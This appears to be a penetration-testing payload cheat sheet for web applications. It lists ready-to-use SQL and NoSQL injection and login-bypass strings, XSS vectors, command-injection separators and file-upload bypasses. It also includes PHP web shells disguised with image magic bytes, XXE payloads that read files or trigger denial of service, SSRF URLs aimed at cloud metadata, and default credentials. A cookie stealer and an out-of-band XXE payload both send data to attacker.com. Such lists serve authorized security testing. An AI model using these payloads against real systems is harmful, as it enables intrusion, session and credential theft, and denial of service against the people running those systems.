MySQL Payloads
Basic Union-Based SQLi
Union-based SQL injection to extract data from a MySQL database
' UNION SELECT NULL,NULL,NULL-- -
Database Version Detection
Detects the MySQL database version
' UNION SELECT @@version,NULL,NULL-- -
Extract Database Names
Retrieves all database names
' UNION SELECT schema_name,NULL,NULL FROM information_schema.schemata-- -
Extract Table Names
Retrieves table names from a specific database
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables WHERE table_schema='DATABASE_NAME'-- -
Extract Column Names
Retrieves column names from a specific table
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='TABLE_NAME'-- -
Time-Based Blind SQLi
Blind SQL injection using a time delay
' AND SLEEP(5)-- -
Boolean-Based Blind SQLi
Blind SQL injection using a boolean condition
' AND 1=1-- -
' AND 1=2-- -
WAF Bypass - Comment Obfuscation
WAF bypass using MySQL comments
'/**/UNION/**/SELECT/**/NULL,NULL-- -
PostgreSQL Payloads
Basic Union-Based (PostgreSQL)
Union-based SQL injection for PostgreSQL
' UNION SELECT NULL,NULL,NULL-- -
PostgreSQL Version
Detects the PostgreSQL version
' UNION SELECT version(),NULL,NULL-- -
Time-Based Blind (PostgreSQL)
Time-based blind SQLi for PostgreSQL
' AND pg_sleep(5)-- -
MSSQL Payloads
Basic Union-Based (MSSQL)
Union-based SQL injection for MSSQL
' UNION SELECT NULL,NULL,NULL-- -
MSSQL Version
Detects the MSSQL version
' UNION SELECT @@version,NULL,NULL-- -
Time-Based Blind (MSSQL)
Time-based blind SQLi for MSSQL
' WAITFOR DELAY '0:0:5'-- -
Reflected XSS
Basic Alert Box
Basic XSS payload with an alert box
<script>alert('XSS')</script>
Image Tag XSS
XSS using an image tag with the onerror event
<img src=x onerror=alert('XSS')>
SVG XSS
XSS using an SVG tag
<svg/onload=alert('XSS')>
Body Onload XSS
XSS using the body tag with the onload event
<body onload=alert('XSS')>
Input Autofocus XSS
XSS using an input with autofocus and onfocus
<input autofocus onfocus=alert('XSS')>
Cookie Stealer
XSS to steal cookies and send them to the attacker's server
<script>document.location='http://attacker.com/?c='+document.cookie</script>
WAF Bypass XSS
Case Variation Bypass
Filter bypass using case variation
<ScRiPt>alert('XSS')</sCrIpT>
Double Encoding
XSS with double URL encoding
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
Null Byte Injection
Bypass using a null byte
<script>%00alert('XSS')</script>
HTML Entity Encoding
XSS with HTML entity encoding
<img src=x onerror="alert('XSS')">
DOM-Based XSS
Location Hash XSS
DOM XSS via the location hash
#<img src=x onerror=alert('XSS')>
Document.write XSS
XSS via the document.write sink
<script>document.write('<img src=x onerror=alert(1)>')</script>
Linux Command Injection
Basic Command Injection (Semicolon)
Command injection using the semicolon separator
; whoami
Pipe Command Injection
Command injection using a pipe
| whoami
AND Operator Injection
Command injection using the AND operator
&& whoami
OR Operator Injection
Command injection using the OR operator
|| whoami
Backtick Command Substitution
Command injection using backtick substitution
`whoami`
Dollar Parenthesis Substitution
Command injection using $() substitution
$(whoami)
Newline Injection
Command injection using a newline character
%0a whoami
Time-Based Blind Injection
Blind command injection with a time delay
; sleep 5
Output Redirection
Command injection with output redirection to a file
; whoami > /tmp/output.txt
Windows Command Injection
CMD Pipe Injection
Windows command injection with a pipe
| whoami
CMD AND Operator
Windows command injection with AND
& whoami
PowerShell Injection
PowerShell command injection
; powershell -c "whoami"
Extension Bypass
Double Extension
Bypass using a double extension
shell.php.jpg
shell.php.png
shell.php.gif
Null Byte Injection
Bypass using a null byte (PHP < 5.3.4)
shell.php%00.jpg
shell.php\x00.png
Case Variation
Bypass using case variation in the extension
shell.pHp
shell.PhP
shell.PHP
Alternative PHP Extensions
Using alternative PHP extensions
shell.php3
shell.php4
shell.php5
shell.phtml
shell.pht
shell.phar
shell.php76
shell.phps
Trailing Spaces/Dots
Bypass using trailing spaces or dots
shell.php.
shell.php..
shell.php
shell.php%20
Content-Type Bypass
MIME Type Manipulation
Changing the Content-Type header to bypass validation
Content-Type: image/jpeg
Content-Type: image/png
Content-Type: image/gif
Magic Bytes Manipulation
GIF Magic Bytes + PHP
PHP file with GIF magic bytes at the start
GIF89a;
<?php system($_GET['cmd']); ?>
JPEG Magic Bytes + PHP
PHP file with JPEG magic bytes (hex: FF D8 FF E0)
ÿØÿÃ
<?php system($_GET['cmd']); ?>
PNG Magic Bytes + PHP
PHP file with PNG magic bytes (hex: 89 50 4E 47)
‰PNG
<?php system($_GET['cmd']); ?>
.htaccess Upload
.htaccess - Execute as PHP
Upload an .htaccess to execute certain files as PHP
AddType application/x-httpd-php .jpg
AddHandler application/x-httpd-php .jpg
SQL Authentication Bypass
Classic OR 1=1
Login bypass with an OR condition that is always true
Username: admin' OR '1'='1
Password: admin' OR '1'='1
' or 1=1 limit 1 -- -+
Comment-Based Bypass
Bypass by commenting out the rest of the query
Username: admin'--
Username: admin'#
Username: admin'/*
UNION-Based Auth Bypass
Bypass using UNION SELECT
Username: ' UNION SELECT 'admin', 'password'--
Username: admin' UNION SELECT NULL,NULL--
Time-Based Blind Auth Bypass
Bypass using time-based blind injection
Username: admin' AND SLEEP(5)--
Username: admin' OR IF(1=1,SLEEP(5),0)--
NoSQL Authentication Bypass
Bypass for NoSQL databases (MongoDB)
Username: {"$gt":""}
Password: {"$gt":""}
Username: admin
Password: {"$ne":null}
Default Credentials
Common Default Logins
List of commonly used default usernames and passwords
admin:admin
admin:password
admin:12345
administrator:administrator
root:root
root:toor
admin:admin123
guest:guest
user:user
XXE Injection Payloads
Basic XXE - File Read
XXE to read local files from the server
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
XXE - Read Windows Files
XXE to read files from a Windows system
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
]>
<foo>&xxe;</foo>
Blind XXE - OOB Data Exfiltration
Blind XXE with out-of-band data exfiltration
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<foo></foo>
XXE - SSRF Attack
XXE to perform SSRF against the internal network
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://127.0.0.1:80/">
]>
<foo>&xxe;</foo>
XXE - Billion Laughs (DoS)
XXE attack for DoS using entity expansion
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>
SSRF Payloads
Basic SSRF - Localhost
SSRF to access localhost/internal services
http://127.0.0.1/
http://localhost/
http://0.0.0.0/
http://[::1]/
SSRF - Internal Network Scan
SSRF for scanning the internal network
http://192.168.0.1/
http://192.168.1.1/
http://10.0.0.1/
http://172.16.0.1/
SSRF - Cloud Metadata
SSRF to access cloud metadata services
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://metadata.google.internal/computeMetadata/v1/
SSRF Bypass - Using @ Symbol
SSRF filter bypass using @ to redirect
http://expected-host@127.0.0.1/
http://expected-host@localhost/
SSRF Bypass - URL Encoding
SSRF filter bypass with URL encoding
http://127.0.0.1/ → http://%31%32%37%2e%30%2e%30%2e%31/
http://localhost/ → http://%6c%6f%63%61%6c%68%6f%73%74/
SSRF Bypass - IP Obfuscation
Bypass using various IP address formats
http://2130706433/ (decimal)
http://0x7f000001/ (hexadecimal)
http://017700000001/ (octal)
http://127.1/
SSRF - File Protocol
SSRF using the file protocol to read local files
file:///etc/passwd
file:///c:/windows/win.ini
file:///proc/self/environ